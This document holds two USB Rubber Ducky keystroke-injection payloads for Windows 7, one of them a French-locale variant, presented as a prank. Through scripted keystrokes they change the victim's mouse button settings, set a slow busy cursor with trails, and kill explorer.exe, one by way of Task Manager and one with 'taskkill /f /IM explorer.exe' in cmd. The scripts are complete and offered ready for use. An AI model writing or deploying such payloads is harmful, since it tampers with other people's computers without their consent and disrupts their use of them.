Author: Caleb Hutchinson
Duckencoder: 1.0
Target: Windows 7
Description: This is a fun payload that changes the users mouse cursor to a loading sign, and shuts off every thing on their desktop that runs explorer (every thing in windows)

 GUI d
 CONTROL ESCAPE
 STRING mouse
 REM this is opening up the mouse config.
 ENTER
 STRING n
 TAB
 STRING n
 TAB
 STRING n
 REM this set all of there mouse clicks to nothing (user cant click :D)
 TAB
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 REM this makes the double click speed area the slowest
 TAB
 TAB
 TAB
 TAB
 TAB
 TAB
 TAB
 RIGHTARROW
 REM this switches over to the "pointers"
 TAB
 STRING w
 TAB
 TAB
 STRING b
 REM changes the cursor look to busy 
 TAB
 TAB
 TAB
 TAB
 TAB
 TAB
 TAB
 TAB
 RIGHTARROW
 TAB
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 LEFTARROW
 REM makes there "busy" cursor go as slow as possible
 STRING d
 STRING s
 REM makes the cursor have a "trail" and if ctrl+clicked a "location"
 STRING a
 ENTER
 GUI
 STRING task manager
 TAB
 TAB
 TAB
 TAB
 TAB
 RIGHTARROW
 TAB
 STRING explorer
 TAB
 STRING e
 ENTER
 REM This open taskmanager, and turns of explorer (this runs windows) to get back on just ctrl+alt+dlt and goto processes and start "explorer.exe" without ""
 REM Enjoy, ps if this has errors please let me know, email at Calebhutch@yahoo.com thanks :D     



-----------------------------------------------

* Author: FlyinGrub
* Target: Windows 7
* Description: same things but better :P, (work on french windows, some shortcut differs ...)
 REM *-this is opening up the mouse config.-*
 DEFAULTDELAY 50
 DELAY 2000
 GUI d
 CONTROL ESCAPE
 STRING Souris
 DELAY 200
 ENTER

 REM *-this switches over to the "pointers"-*
 DELAY 200
 TAB
 TAB
 TAB
 TAB
 TAB
 RIGHTARROW

 REM *-changes the cursor look to busy-* 
 TAB
 TAB
 TAB
 TAB
 TAB		
 ENTER
 TAB
 TAB
 TAB
 TAB
 DOWN
 DOWN
 DOWN
 DOWN
 DOWN
 ENTER

 REM *-makes there "busy" cursor go as slow as possible-*
 TAB
 TAB
 TAB
 TAB
 TAB
 RIGHTARROW
 TAB
 LEFT
 LEFT
 LEFT
 LEFT
 LEFT
 LEFT
 LEFT
 LEFT
 LEFT
 LEFT

 REM *-makes the cursor have a "trail" and if ctrl+clicked a "location"-*
 STRING h
 ENTER
 DELAY 200

 REM *-killing explorer.exe-*
 GUI r
 DELAY 200
 STRING cmd.exe
 ENTER
 DELAY 300
 STRING taskkill /f /IM explorer.exe
 DELAY 100
 ENTER
 DELAY 100
 STRING exit
 DELAY 100
 ENTER
 DELAY 100
 ALT F4
 ALT F4
 ALT F4
